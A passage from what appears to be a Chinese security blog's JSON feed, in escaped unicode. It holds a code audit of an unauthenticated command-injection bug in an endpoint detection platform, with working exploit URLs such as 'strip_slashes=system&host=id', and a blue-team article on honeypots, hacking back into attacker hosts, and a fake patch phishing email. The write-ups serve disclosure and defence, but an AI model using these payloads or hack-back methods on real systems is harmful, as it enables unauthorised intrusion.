                    \u5410\u69fd\uff1a\u8fd9\u5957\u4ea7\u54c1\u7684\u4ee3\u7801\u903b\u8f91\u771f\u7684\u592a\u82b1\u91cc\u80e1\u54e8\u4e86\uff0c\u903b\u8f91\u7ed5\u6765\u7ed5\u53bb\uff0c\u9605\u8bfb\u65f6\u53ef\u80fd\u9700\u8981\u4e00\u5b9a\u8010\u5fc3\uff0c\u6587\u4e2d\u7701\u7565\u4e86\u4e00\u4e9b\u7ec6\u8282\uff0c\u4f46\u6211\u5df2\u7ecf\u5c3d\u91cf\u5199\u7684\u8ba9\u5927\u5bb6\u80fd\u660e\u767d\u6574\u4e2a\u6838\u5fc3\u903b\u8f91\uff0c\u611f\u8c22\u9605\u8bfb\u3002<\/p>\n\n","pubDate":"2020-09-03T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2020-09-03\/3","guid":"https:\/\/gh0st.cn\/archives\/2020-09-03\/3"},{"title":"\u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u5ba1\u8ba1\u5206\u6790","description":"
                    \u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u5ba1\u8ba1\u5206\u6790<\/h1>\n\n
                    \u524d\u8a00<\/h2>\n\n
                    2020\u5e7408\u670817\u65e5\u6536\u5230\u4e00\u6761\u6f0f\u6d1e\u60c5\u62a5\uff0c\u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u672a\u6388\u6743RCE\uff1a\/tool\/log\/c.php?strip_slashes=system&host=id<\/code><\/p>\n\n
                    \"-w1120\"<\/p>\n\n
                    \u53c2\u6570\uff1ahost<\/strong>\uff0c\u53ef\u4ee5\u4fee\u6539\u4efb\u610f\u7684\u7cfb\u7edf\u547d\u4ee4\u8fdb\u884c\u6267\u884c\u3002<\/p>\n\n
                    \u539f\u7406\u5206\u6790<\/h2>\n\n
                    \u9996\u5148\u6211\u4eec\u8ddf\u8fdb\u4e00\u4e0b\/tool\/log\/c.php<\/strong>\u6587\u4ef6\u53d1\u73b0\u5176\u6ca1\u6709\u4efb\u4f55\u6743\u9650\u9650\u5236\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u770b\u4e00\u4e0b\u8bf7\u6c42\u53c2\u6570\u662f\u5982\u4f55\u4f20\u9012\u7684\uff0c\u641c\u7d22\u5173\u952e\u8bcd\uff1a<\/p>\n\n
                    $_POST\n$_GET\n$_REQUEST\n<\/code><\/pre>\n\n
                    \u5728\u4ee3\u7801\u7b2c144\u884c\u3001146\u884c\u5206\u522b\u8c03\u7528\u4e86\u53d8\u91cf\u533f\u540d\u51fd\u6570<\/strong>\uff0c\u5e76\u5c06$_REQUEST<\/code>\u4f5c\u4e3a\u4f20\u9012\u53c2\u6570\uff1a<\/p>\n\n
                    $show_form($_REQUEST);\n...\n$main($_REQUEST);\n<\/code><\/pre>\n\n
                    \u5148\u8ddf\u8fdb$show_form<\/strong>\u8fd9\u4e2a\u533f\u540d\u51fd\u6570\uff1a<\/p>\n\n
                    $show_form = function($params) use(&$strip_slashes, &$show_input) {\n    extract($params);\n    $host  = isset($host)  ? $strip_slashes($host)  : \"127.0.0.1\";\n    $path  = isset($path)  ? $strip_slashes($path)  : \"\";\n    $row   = isset($row)   ? $strip_slashes($row)   : \"\";\n    $limit = isset($limit) ? $strip_slashes($limit) : 1000;\n    \n    \/\/ \u7ed8\u5236\u8868\u5355\n    echo \"<pre>\";\n    echo '<form id=\"studio\" name=\"studio\" method=\"post\" action=\"\">';\n    $show_input(array(\"title\" => \"Host \",  \"name\" => \"host\",  \"value\" => $host,  \"note\" => \" - host, e.g. 127.0.0.1\"));\n    $show_input(array(\"title\" => \"Path \",  \"name\" => \"path\",  \"value\" => $path,  \"note\" => \" - path regex, e.g. mapreduce\"));\n    $show_input(array(\"title\" => \"Row  \",  \"name\" => \"row\",   \"value\" => $row,   \"note\" => \" - row regex, e.g. \\s[w|e]\\s\"));\n    $show_input(array(\"title\" => \"Limit\",  \"name\" => \"limit\", \"value\" => $limit, \"note\" => \" - top n, e.g. 100\"));\n    echo '<input type=\"submit\" id=\"button\">';\n    echo '<\/form>';\n    echo \"<\/pre>\";\n};\n<\/code><\/pre>\n\n
                    \u53d8\u91cf\u533f\u540d\u51fd\u6570 $show_form<\/strong> \u5177\u6709\u4e00\u4e2a\u5f62\u5f0f\u53c2\u6570 $params<\/strong> \u5728\u8fd9\u91cc\u4e5f\u5c31\u662farray(\"strip_slashes\"=>\"system\",\"host\"=>\"id\");<\/code><\/p>\n\n
                    \u63a5\u4e0b\u6765\u6267\u884cextract($params);<\/strong>\uff0c\u540e\u8fdb\u5165\u5982\u4e0b\u4ee3\u7801\uff1a<\/p>\n\n
                    $host  = isset($host)  ? $strip_slashes($host)  : \"127.0.0.1\";\n<\/code><\/pre>\n\n
                    \u5728\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d\u5c31\u4ea7\u751f\u4e86\u6f0f\u6d1e\uff0c\u60f3\u8981\u4e86\u89e3\u5177\u4f53\u539f\u56e0\uff0c\u6211\u4eec\u9700\u8981\u4e86\u89e3extract<\/strong>\u51fd\u6570\u7684\u4f5c\u7528\uff0c\u8be5\u51fd\u6570\u662f\u6839\u636e\u6570\u7ec4\u7684key=>value<\/code>\u521b\u5efa\u53d8\u91cf$key=value<\/code>\uff08\u5b98\u65b9\u89e3\u91ca\uff1aextract \u2014 Import variables into the current symbol table from an array<\/strong>\uff09<\/p>\n\n
                    \u77e5\u9053\u5176\u51fd\u6570\u4f5c\u7528\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u5927\u81f4\u660e\u767d\u6f0f\u6d1e\u539f\u56e0\u4e86\u3002<\/p>\n\n
                    \u9996\u5148\u51fd\u6570\u4f20\u5165\u53c2\u6570\u503c\u4e3aarray(\"strip_slashes\"=>\"system\",\"host\"=>\"id\");<\/code><\/p>\n\n
                    \u7ecf\u8fc7extract()<\/strong>\u51fd\u6570\u540e\uff0c\u8d4b\u503c\u4e862\u4e2a\u53d8\u91cf\uff1a<\/p>\n\n
                    $strip_slashes = 'system';\n$host = 'id';\n<\/code><\/pre>\n\n
                    \u5728\u7b2c91\u884c\u4ee3\u7801\uff0c\u53d8\u91cf$host<\/strong>\u5229\u7528\u4e09\u5143\u8fd0\u7b97\u91cd\u65b0\u8d4b\u503c$strip_slashes($host)<\/strong><\/p>\n\n
                    \u800c\u5b9e\u9645\u4e0a\u5176\u8d4b\u503c\u5185\u5bb9\u662f\u51fd\u6570system('id')<\/code>\u7684\u8fd4\u56de\u7ed3\u679c\uff0c\u8fd9\u4e5f\u5c31\u9020\u6210\u4e86\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002<\/p>\n\n
                    \u540c\u7c7b\u6f0f\u6d1e\u5bfb\u627e<\/h2>\n\n
                    \u9996\u5148\u5728\u5168\u5c40\u6587\u4ef6\u4e2d\u641c\u7d22$_GET\u3001$_POST\u3001$_REQUEST<\/code>\u548cextract(<\/code>\uff0c\u5176\u6b21\u5728\u8fd9\u4e9b\u6587\u4ef6\u4e2d\u4f7f\u7528\u6b63\u5219\u5bfb\u627e\u53d8\u91cf\u51fd\u6570\u4f20\u9012\u53d8\u91cf\uff1a\\$[a-zA-Z0-9_]*\\(\\$[a-zA-Z0-9_]*\\)<\/code><\/p>\n\n
                    Linux grep\u5bfb\u627e\u547d\u4ee4\uff1a<\/p>\n\n
                    grep -E \"\\$_GET|\\$_POST|\\$_REQUEST\" . -r --include \\*.php -v | grep \"extract(\" -v | grep -E \"\\\\\\$[a-zA-Z0-9_]*\\(\\\\\\$[a-zA-Z0-9_]*\\)\"\n<\/code><\/pre>\n\n
                    \u7b80\u5355\u5206\u6790\u83b7\u5f97\u4e86\u53e6\u5916\u4e09\u5904RCE\uff1a<\/p>\n\n
                    \/tool\/php_cli.php?strip_slashes=system&code=id\n\/tool\/ldb_cli.php?strip_slashes=system&json=id\n\/tool\/mdd_sql.php?strip_slashes=system&root=id\n<\/code><\/pre>\n\n
                    \u4f46\u65e0\u6cd5\u771f\u6b63\u5229\u7528\uff0c\u4e09\u5904\u6587\u4ef6\u5f00\u5934\u90fd\u6709\u4e00\u4e2a\u7c7b\u4f3c\u6587\u4ef6\u5b58\u6d3b\u7684\u5224\u65ad\uff0c\u4e0d\u5b58\u5728\u4ee3\u7801\u5219die<\/strong>\u9000\u51fa\uff0c\u800c\u9ed8\u8ba4\u73af\u5883\u4e0a\u662f\u5b58\u5728\uff1a<\/p>\n\n
                    \"-w568\"<\/p>\n\n
                    \u6700\u540e<\/h2>\n\n
                    \u8be5\u5957\u7a0b\u5e8f\u8fd8\u6709\u8bf8\u591a\u6f0f\u6d1e\u672a\u88ab\u62ab\u9732\u51fa\u6765\uff0c\u5efa\u8bae\u91c7\u7528ACL\u63a7\u5236\u8bbf\u95ee\u6216\u4e0b\u7ebf\u8be5\u4e1a\u52a1\uff0c\u7b49\u5f85\u5b98\u65b9\u5347\u7ea7\u8865\u4e01\u3002<\/p>\n","pubDate":"2020-09-03T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2020-09-03\/2","guid":"https:\/\/gh0st.cn\/archives\/2020-09-03\/2"},{"title":"\u6d45\u8c08\u84dd\u961f\u53cd\u5236\u624b\u6bb5","description":"
                    \u6d45\u8c08\u84dd\u961f\u53cd\u5236\u624b\u6bb5<\/h1>\n\n
                    \u524d\u8a00<\/h2>\n\n
                    \u7f51\u7edc\u5b89\u5168\u653b\u9632\u6f14\u4e60\u5728\u56fd\u5185\u5df2\u7ecf\u9010\u6e10\u5e38\u6001\u5316\uff0c\u4ece\u884c\u4e1a\u3001\u533a\u57df\uff08\u7701\u4efd\u3001\u5730\u5e02\uff09\u5230\u90e8\u7ea7\u2026<\/p>\n\n
                    2020\u5e741\u6708\u4efd\u5f00\u59cb\u5230\u73b0\u5728\u53ef\u4ee5\u8bf4\u57fa\u672c\u4e0a\u6bcf\u4e2a\u6708\u90fd\u67091-3\u573aHW\uff0c\u7ea2\u4e0e\u84dd\u7684\u5bf9\u6297\u4ece\u672a\u505c\u606f\u3002<\/p>\n\n
                    \u7ea2\u961f\u7684\u653b\u51fb\u6280\u5de7\u53ef\u4ee5\u65e0\u7a77\u65e0\u5c3d\uff08\u626b\u63cf\u5668\u3001\u793e\u5de5\u30010day\u3001\u8fd1\u6e90\u2026\uff09\uff0c\u4f46\u662f\u5bf9\u4e8e\u84dd\u961f\u9632\u5b88\u6765\u8bf4\u9664\u4e86\u6f14\u4e60\u4e2d\u5e38\u89c4\u7684\u5c01IP\u3001\u4e0b\u7ebf\u4e1a\u52a1\u3001\u770b\u65e5\u5fd7\u5206\u6790\u6d41\u91cf\u7b49\u201c\u7eaf\u9632\u5b88\u201d\u64cd\u4f5c\u4ee5\u5916\uff0c\u4f3c\u4e4e\u5b9e\u5728\u662f\u6ca1\u6709\u4ec0\u4e48\u5176\u4ed6\u7684\u9632\u5fa1\u624b\u6bb5\u4e86\u3002<\/p>\n\n
                    \u7b14\u8005\u5728\u53c2\u4e0e\u7684\u51e0\u573a\u653b\u9632\u6f14\u4e60\u9879\u76ee\u4e2d\u62c5\u4efb\u201c\u84dd\u961f\u9632\u5b88\u201d\u89d2\u8272\uff0c\u5c31\u53d1\u73b0\u4e86\u8fd9\u4e00\u7f3a\u9677\uff0c\u4f3c\u4e4e\u5b89\u5168\u9632\u5fa1\u57fa\u7840\u8f83\u5f31\u7684\u5382\u5546\u518d\u600e\u4e48\u5145\u8db3\u7684\u8fdb\u884c\u6f14\u4e60\u524d\u51c6\u5907\uff0c\u90fd\u53ea\u6709\u4e56\u4e56\u7684\u7b49\u5f85\u88ab\u201c\u6536\u5272\u201d\u3002<\/p>\n\n
                    \u8f6c\u6362\u4e00\u4e2a\u601d\u7ef4\uff0c\u5316\u88ab\u52a8\u4e3a\u4e3b\u52a8\uff0c\u5c1d\u8bd5\u7528\u201c\u653b\u51fb\u201d\u601d\u8def\u4ee3\u5165\u201c\u9632\u5b88\u201d\u4e2d\uff0c\u5bf9\u201c\u7ea2\u961f\u201d\u8fdb\u884c\u53cd\u5411\u6355\u83b7\uff08\u53cd\u5236\uff09\u3002<\/p>\n\n
                    \u672c\u6587\u5c06\u603b\u7ed3\u6848\u4f8b\u548c\u201c\u53cd\u5236\u201d\u624b\u6bb5\uff0c\u6587\u4e2d\u4e0d\u8db3\u4e4b\u5904\u8fd8\u671b\u5404\u4f4d\u65a7\u6b63\u3002<\/p>\n\n
                    \u53cd\u5236\u624b\u6bb5<\/h2>\n\n
                    \u871c\u7f50\u7bc7<\/h3>\n\n
                    \u871c\u7f50\u8bbe\u5907<\/h4>\n\n
                    \u5927\u90e8\u5206\u5382\u5546\u4e3a\u4e86\u4e89\u53d6\u5f97\u5230\u4e00\u4e9b\u5206\u6570\uff0c\u90fd\u4f1a\u91c7\u8d2d\/\u501f\u7528\u4e00\u4e9b\u5382\u5546\u7684\u871c\u7f50\u8bbe\u5907\uff0c\u4f46\u871c\u7f50\u4e5f\u5206\u4e24\u7c7b\uff1a\u4f20\u7edf\u3001\u73b0\u4ee3\uff0c\u4e24\u8005\u4ece\u672c\u8d28\u4e0a\u8fd8\u662f\u6709\u4e00\u5b9a\u533a\u522b\u7684\uff0c\u8fd9\u91cc\u6211\u7b80\u5355\u8bf4\u4e00\u4e0b\u81ea\u5df1\u7684\u7406\u89e3\u3002<\/p>\n\n
                    \u4f20\u7edf\u871c\u7f50\uff1a<\/strong>\u871c\u7f50\u6280\u672f\u672c\u8d28\u4e0a\u662f\u4e00\u79cd\u5bf9\u653b\u51fb\u65b9\u8fdb\u884c\u6b3a\u9a97\u7684\u6280\u672f\uff0c\u901a\u8fc7\u5e03\u7f6e\u4e00\u4e9b\u4f5c\u4e3a\u8bf1\u9975\u7684\u4e3b\u673a\u3001\u7f51\u7edc\u670d\u52a1\u6216\u8005\u4fe1\u606f\uff0c\u8bf1\u4f7f\u653b\u51fb\u65b9\u5bf9\u5b83\u4eec\u5b9e\u65bd\u653b\u51fb\uff0c\u4ece\u800c\u53ef\u4ee5\u5bf9\u653b\u51fb\u884c\u4e3a\u8fdb\u884c\u6355\u83b7\u548c\u5206\u6790\uff0c\u4e86\u89e3\u653b\u51fb\u65b9\u6240\u4f7f\u7528\u7684\u5de5\u5177\u4e0e\u65b9\u6cd5\uff0c\u63a8\u6d4b\u653b\u51fb\u610f\u56fe\u548c\u52a8\u673a\uff0c\u80fd\u591f\u8ba9\u9632\u5fa1\u65b9\u6e05\u6670\u5730\u4e86\u89e3\u4ed6\u4eec\u6240\u9762\u5bf9\u7684\u5b89\u5168\u5a01\u80c1\uff0c\u5e76\u901a\u8fc7\u6280\u672f\u548c\u7ba1\u7406\u624b\u6bb5\u6765\u589e\u5f3a\u5b9e\u9645\u7cfb\u7edf\u7684\u9632\u5fa1\u80fd\u529b\u3002<\/p>\n\n
                    \u73b0\u4ee3\u871c\u7f50\uff1a<\/strong>\u9664\u4e86\u6355\u83b7\u5206\u6790\u653b\u51fb\u884c\u4e3a\u5916\uff0c\u5404\u7c7b\u5b89\u5168\u5382\u5546\u5728\u871c\u7f50\u4ea7\u54c1\u4e2d\u52a0\u5165\u4e86\u201c\u653b\u51fb\u8005\u753b\u50cf\u201d\u8fd9\u4e00\u529f\u80fd\u4f5c\u4e3a\u201c\u5356\u70b9\u201d\uff0c\u800c\u672c\u8d28\u4e0a\u653b\u51fb\u8005\u753b\u50cf\u662f\u5c06\u7b2c\u4e09\u65b9\u5382\u5546\u6f0f\u6d1e\u8f6c\u4e3a\u753b\u50cf\u63a2\u9488\uff0c\u5229\u7528\u7b2c\u4e09\u65b9\u5382\u5546\u6f0f\u6d1e\u83b7\u53d6\u653b\u51fb\u8005\u6240\u5728\u6b64\u7c7b\u5382\u5546\u7f51\u7ad9\u4e1a\u52a1\u4e0a\u7684\u4e2a\u4eba\u4fe1\u606f\uff0c\u6b64\u7c7b\u6f0f\u6d1e\u591a\u534a\u4e3a\u524d\u7aef\u7c7b\u6f0f\u6d1e\uff0c\u4f8b\u5982\uff1aJSONP\u3001XSS\u2026\u9664\u6b64\u4e4b\u5916\u8fd8\u6709\u7f51\u7ad9\u4f2a\u9020\u3001\u81ea\u52a8\u6295\u653e\u871c\u6807\u7b49\u7b49\u4f17\u591a\u4e30\u5bcc\u7684\u529f\u80fd\u3002<\/p>\n\n
                    \u6240\u4ee5\u4f20\u7edf\u871c\u7f50\u5382\u5546\u5728\u8fd9\u4e00\u5757\u7684\u88ab\u201c\u9700\u8981\u201d\u4e0d\u5927\uff0c\u800c\u73b0\u4ee3\u871c\u7f50\u5382\u5546\u5728\u8fd9\u4e00\u5757\u5f80\u5f80\u6709\u9700\u8981\u6027\u5f88\u591a\uff0c\u5c31\u51b2\u201c\u653b\u51fb\u8005\u753b\u50cf\u201d\u8fd9\u4e00\u65b9\u9762\u5728\u6f14\u4e60\u8fc7\u7a0b\u4e2d\u5c31\u53ef\u4ee5\u4e3a\u9632\u5b88\u65b9\u52a0\u5206\u3002<\/p>\n\n
                    \u871c\u7f50\u7684\u53cd\u5236<\/h4>\n\n
                    \u73b0\u4ee3\u5316\u871c\u7f50\u90fd\u505a\u4e86\u54ea\u4e9b\u53cd\u5236\u7684\u64cd\u4f5c\u5462\uff1f<\/p>\n\n
                      \n  
                    1. \u53ef\u514b\u9686\u76f8\u5173\u7cfb\u7edf\u9875\u9762\uff0c\u4f2a\u88c5\u201c\u6f0f\u6d1e\u201d\u7cfb\u7edf<\/li>\n  
                    2. \u4e92\u8054\u7f51\u7aef\u6295\u9975\uff0c\u4e00\u822c\u4f1a\u5728Github\u3001Gitee\u3001Coding\u4e0a\u6295\u653e\u871c\u6807\uff08\u6709\u53ef\u80fd\u662f\u4e2a\u5355\u72ec\u7684\u7f51\u7ad9\u5730\u5740\u3001\u4e5f\u6709\u53ef\u80fd\u662f\u4e2a\u5bc6\u7801\u672c\u5f15\u8bf1\u4e2d\u62db\uff09<\/li>\n  
                    3. \u5229\u7528JSONP\u3001XSS\u3001CSRF\u7b49\u524d\u7aef\u7c7b\u6f0f\u6d1e\u83b7\u53d6\u8bbf\u95ee\u871c\u6807\u7684\u653b\u51fb\u8005\u7f51\u7edc\u8eab\u4efd\uff08\u7f51\u7edc\u753b\u50cf\uff09<\/li>\n<\/ol>\n\n
                      \u8fd9\u6837\u5176\u5b9e\u4e00\u6761\u6355\u83b7\u94fe\u5c31\u51fa\u73b0\u4e86\uff08\u4ec5\u4ec5\u662f\u4e3e\u4f8b\uff0c\u5176\u5b9e\u66f4\u591a\u7684\u662f\u5bf9\u65b9\u5728\u505a\u4fe1\u606f\u6536\u96c6\u7684\u65f6\u5019\u63a2\u6d4b\u5230\u4e86\u6b64\u7aef\u53e3\uff09\uff1a<\/p>\n\n
                      \"-w645\"<\/p>\n\n
                      \u871c\u7f50\u7684\u4e00\u4e9b\u529f\u80fd\u7ec6\u8282\u4e0d\u8fc7\u591a\u8d58\u8ff0\uff0c\u6bd4\u5982\u5229\u7528JavaScript\u8fa8\u522b\u4eba\u673a\u3001Cookie\u4e2d\u79cd\u5165ID\u9632\u6b62\u5207\u6362IP\u4e4b\u7c7b\u7684\u2026\u5982\u6709\u5174\u8da3\u60f3\u6df1\u5165\u4e86\u89e3\u7684\u670b\u53cb\u53ef\u4ee5\u53bb\u76f8\u5173\u5382\u5546\u5b98\u7f51\u4e0b\u8f7d\u767d\u76ae\u4e66\u89c2\u770b\u3002<\/p>\n\n
                      \u6ce8\uff1a\u5728\u5b9e\u6218\u6f14\u4e60\u8fc7\u7a0b\u4e2d\uff0c\u4ecd\u7136\u6709\u8bb8\u591a\u653b\u51fb\u8005\u4e2d\u62db\uff0c\u871c\u7f50\u4f1a\u5b58\u50a8\u8eab\u4efd\u6570\u636e\uff0c\u5e76\u4e14\u4f1a\u56de\u4f20\u81f3\u5382\u5546\u8fdb\u884c\u5b58\u50a8\u3002<\/p>\n\n
                      \u573a\u666f\u7bc7<\/h3>\n\n
                      \u4e3b\u52a8\u653b\u51fb\u201c\u653b\u51fbIP\u201d<\/h4>\n\n
                      \u9632\u5b88\u65e5\u5e38\u5c31\u662f\u770b\u6d41\u91cf\u3001\u5206\u6790\u6d41\u91cf\uff0c\u5176\u4e2d\u5927\u90e8\u5206\u90fd\u4e3a\u626b\u63cf\u5668\u6d41\u91cf\uff0c\u7531\u4e8e\u4e00\u822c\u626b\u63cf\u5668\u90fd\u4f1a\u90e8\u7f72\u5728VPS\u4e0a\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u7ed3\u5408\u6d41\u91cf\u76d1\u6d4b\u5e73\u53f0<\/strong>\u53cd\u5411\u626b\u63cf\u3002<\/p>\n\n
                      \"\"<\/p>\n\n
                      \u5bfc\u51fa\u6f14\u4e60\u671f\u95f4\u653b\u51fbIP\u5217\u8868\uff0c\u5bf9IP\u8fdb\u884c\u7aef\u53e3\u626b\u63cf\uff0c\u4eceWeb\u6253\u5165\u653b\u51fbIP\u673a\u5668\u5185\u90e8\u3002<\/p>\n\n
                      \"\"<\/p>\n\n
                      \u53d1\u73b0\u4e86\u4e00\u5806\u653b\u51fbIP\u673a\u5668\u4e0aWeb\u670d\u52a1\u7684\u6f0f\u6d1e\uff1aSQL\u6ce8\u5165\u3001\u5f31\u53e3\u4ee4\u2026\u62ff\u4e0b\u4e86\u4e00\u5806\u673a\u5668\uff0c\u4e5f\u53d1\u73b0\u4e86\u5927\u90e8\u5206\u90fd\u662f\u201c\u88ab\u63a7\u4e3b\u673a\u201d\uff0c\u800c\u975e\u8d2d\u4e70\u7684VPS\uff0c\u4e0a\u9762\u4e5f\u5927\u591a\u662f\u4e00\u4e9b\u6b63\u5e38\u4e1a\u52a1\u3001\u975e\u6cd5\u4e1a\u52a1\u5728\u8fd0\u8f6c\u3002<\/p>\n\n
                      \"\"<\/p>\n\n
                      \u9664\u6b64\u4e4b\u5916\uff0c\u6211\u4eec\u5bf9\u6240\u62ff\u4e0b\u7684\u4e3b\u673a\u8fdb\u884c\u4fe1\u606f\u6536\u96c6\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a\u6709\u610f\u601d\u7684\u70b9\uff0c\u5927\u90e8\u5206\u673a\u5668\u4e3aWAMP\uff08Windows + Apache + Mysql + PHP\uff09\uff0c\u800c\u6839\u76ee\u5f55\u90fd\u5b58\u5728\u7740\u4e00\u4e2a\u6587\u4ef6images.php<\/code>\u3002<\/p>\n\n
                      \"\"<\/p>\n\n
                      \u8fd9\u662f\u4e00\u4e2aPHP\u811a\u672c\u540e\u95e8\uff0c\u6211\u4eec\u901a\u8fc7\u5206\u6790\u8be5PHP\u6587\u4ef6\u53c8\u62ff\u4e0b\u6570\u5341\u53f0\u673a\u5668\uff0c\u5bf9\u6bcf\u53f0\u673a\u5668\u8fdb\u884c\u65e5\u5fd7\u6536\u96c6\uff0c\u5206\u6790IP\u5173\u8054\u6027\u2026\u6574\u7406\u62a5\u544a\u4e0a\u4ea4\u88c1\u5224\u7ec4\u5224\u5b9a\u3002<\/p>\n\n
                      \u90ae\u4ef6\u9493\u9c7c\u53cd\u5236<\/h4>\n\n
                      \u5b89\u5168\u9632\u62a4\u57fa\u7840\u8f83\u597d\u7684\u5382\u5546\uff0c\u4e00\u822c\u6765\u8bf4\u9664\u4e86\u51fa\u52a80day\uff0c\u7269\u7406\u8fd1\u6e90\u6e17\u900f\u4ee5\u5916\uff0c\u6700\u5e38\u89c1\u7684\u5c31\u662f\u90ae\u4ef6\u9493\u9c7c\u4e86\uff0c\u5728\u5382\u5546\u6536\u5230\u90ae\u4ef6\u9493\u9c7c\u7684\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u53ef\u4ee5\u91c7\u53d6\u5316\u88ab\u52a8\u4e3a\u4e3b\u52a8\u7684\u65b9\u5f0f\uff0c\u5047\u88c5\u54ac\u94a9\uff0c\u5b9e\u9645\u4e0a\u8bf1\u5bfc\u653b\u51fb\u8005\u8fdb\u5165\u871c\u7f51\u3002<\/p>\n\n
                      \u5317\u4eac\u65f6\u95f4 2019 \u5e74 5 \u6708 15 \u65e5\u5fae\u8f6f\u53d1\u5e03\u5b89\u5168\u8865\u4e01\u4fee\u590d\u4e86 CVE \u7f16\u53f7\u4e3a CVE-2019-0708 \u7684 Windows \u8fdc\u7a0b\u684c\u9762\u670d\u52a1(RDP)\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u5728\u4e0d\u9700\u8eab\u4efd\u8ba4\u8bc1\u7684\u60c5\u51b5\u4e0b\u5373\u53ef\u8fdc\u7a0b\u89e6\u53d1\uff0c\u5371\u5bb3\u4e0e\u5f71\u54cd\u9762\u6781\u5927\u3002\n\n\u53d7\u5f71\u54cd\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c\uff1a\n\n| Windows 7\n| Windows Server 2008 R2\n| Windows Server 2008\n| Windows Server 2003\n| Windows XP\n\n\u7531\u4e8e\u8be5\u6f0f\u6d1e\u4e0e\u53bb\u5e74\u7684\u201cWannacry\u201d\u52d2\u7d22\u75c5\u6bd2\u5177\u6709\u76f8\u540c\u7b49\u7ea7\u7684\u5371\u5bb3\uff0c\u7531\u603b\u884c\u4fe1\u606f\u79d1\u6280\u90e8\u7814\u7a76\u51b3\u5b9a\uff0c\u5148\u63a8\u884c\u7d27\u6025\u6f0f\u6d1e\u52a0\u56fa\u8865\u4e01\uff0c\u786e\u4fdd\u4e1a\u52a1\u7f51\u3001\u529e\u516c\u7f51\u5168\u90e8\u4fee\u8865\u6f0f\u6d1e\uff0c\u8be6\u60c5\u8bf7\u9605\u8bfb\u52a0\u56fa\u624b\u518c\u3002\n\n\u52a0\u56fa\u8865\u4e01\u7a0b\u5e8f\u89e3\u538b\u5bc6\u7801\uff1axxxx\n\nxx\u4fe1\u606f\u79d1\u6280\u90e8\nxxxxx\nxxx\u5e74xx\u6708xx\u65e5\n<\/code><\/pre>\n\n
                      \u5728\u67d0\u6b21\u6f14\u4e60\u671f\u95f4\uff0c\u6211\u4eec\u9632\u5b88\u7684\u5ba2\u6237\u5355\u4f4d\u5c31\u6536\u5230\u4e86\u9493\u9c7c\u90ae\u4ef6\uff0c\u5e86\u5e78\u7684\u662f\u5ba2\u6237\u603b\u4f53\u5b89\u5168\u610f\u8bc6\u5f88\u5f3a\uff0c\u52a0\u4e0a\u6709\u90ae\u4ef6\u6c99\u7bb1\u7684\u52a0\u6301\uff0c\u5e76\u6ca1\u6709\u5b9e\u9645\u4eba\u5458\u4e2d\u62db\uff0c\u800c\u6211\u4eec\u5c06\u8ba1\u5c31\u8ba1\uff0c\u90e8\u7f72\u4e00\u5957\u865a\u5047\u7684\u5185\u7f51\u73af\u5883\uff0c\u4f2a\u9020\u9493\u9c7c\u90ae\u4ef6\u4e2d\u62db\u5047\u8c61\uff0c\u4e2d\u62db\u4eba\u5458\u753b\u50cf\u548c\u673a\u5668\u73af\u5883\u7f16\u6392\uff1a<\/p>\n\n
                      \u540d\u5b57\uff1a<\/strong>\u8bb8\u664b \uff08jinxu\uff09<\/p>\n\n
                      \u8eab\u4efd\uff1a<\/strong>\u5de1\u68c0\u804c\u5458<\/p>\n\n
                      \u5e73\u65f6\u4e0a\u673a\u5185\u5bb9\uff1a<\/strong>\u770b\u89c6\u9891\u3001\u6253\u6e38\u620f\u3001\u5de1\u68c0<\/p>\n\n
                      \u7cfb\u7edf\u8f6f\u4ef6\uff1a<\/strong>Office\u4e09\u4ef6\u5957, \u641c\u72d7\u8f93\u5165\u6cd5, QQ, \u5fae\u4fe1, Xmind, \u8c37\u6b4c\u6d4f\u89c8\u5668, Winrar, \u8fc5\u96f7, \u767e\u5ea6\u7f51\u76d8, Everything, \u7231\u5947\u827a, \u817e\u8baf\u89c6\u9891, QQ\u97f3\u4e50, \u7f51\u6613\u4e91\u97f3\u4e50, FastStone Capture\u2026.<\/p>\n\n
                      \u7cfb\u7edf\u73af\u5883\uff1a<\/strong>\u9664\u4e86\u90e8\u7f72\u4e00\u4e9b\u5e38\u89c1\u7684\u7cfb\u7edf\u8f6f\u4ef6\uff0c\u6211\u4eec\u8fd8\u8981\u521b\u5efa\u4e00\u7cfb\u5217\u5de5\u4f5c\u6587\u6863\uff08\u624b\u5de5\u4f2a\u9020\u3001\u7531\u5ba2\u6237\u63d0\u4f9b\u975e\u654f\u611f\u516c\u5f00\u6570\u2026\uff09\uff0c\u5e76\u5728\u4f17\u591a\u7684\u5de5\u4f5c\u6587\u6863\u4e2d\u643a\u5e26\u4e86\u6211\u4eec\u90e8\u7f72\u7684\u514d\u6740\u540e\u95e8\uff08\u4f2a\u88c5\u6210VPN\u5b89\u88c5\u5305\u6216\u529e\u516c\u8f6f\u4ef6\uff09\u3002<\/p>\n\n
                      \u76ee\u7684\uff1a<\/strong>\u70b9\u5f00\u9493\u9c7c\u90ae\u4ef6\u7684\u9644\u4ef6\uff0c\u5047\u88c5\u4e2d\u62db\u540e\uff0c\u8ba9\u653b\u51fb\u8005\u5728\u7ffb\u5f53\u524dPC\u673a\u5668\u7684\u65f6\u5019\u5bfb\u627e\u5230\u6211\u4eec\u6295\u4e0b\u7684\u5047\u5bc6\u7801\u672c\uff0c\u5e76\u7ed3\u5408VPN\u5b89\u88c5\u5305\uff0c\u4f7f\u5f97\u653b\u51fb\u8005\u4e0b\u8f7dVPN\u5b89\u88c5\u5305\u5e76\u8fdb\u884c\u5b89\u88c5\uff0c\u4ece\u800c\u8fdb\u884c\u53cd\u5411\u63a7\u5236\u3002<\/p>\n\n
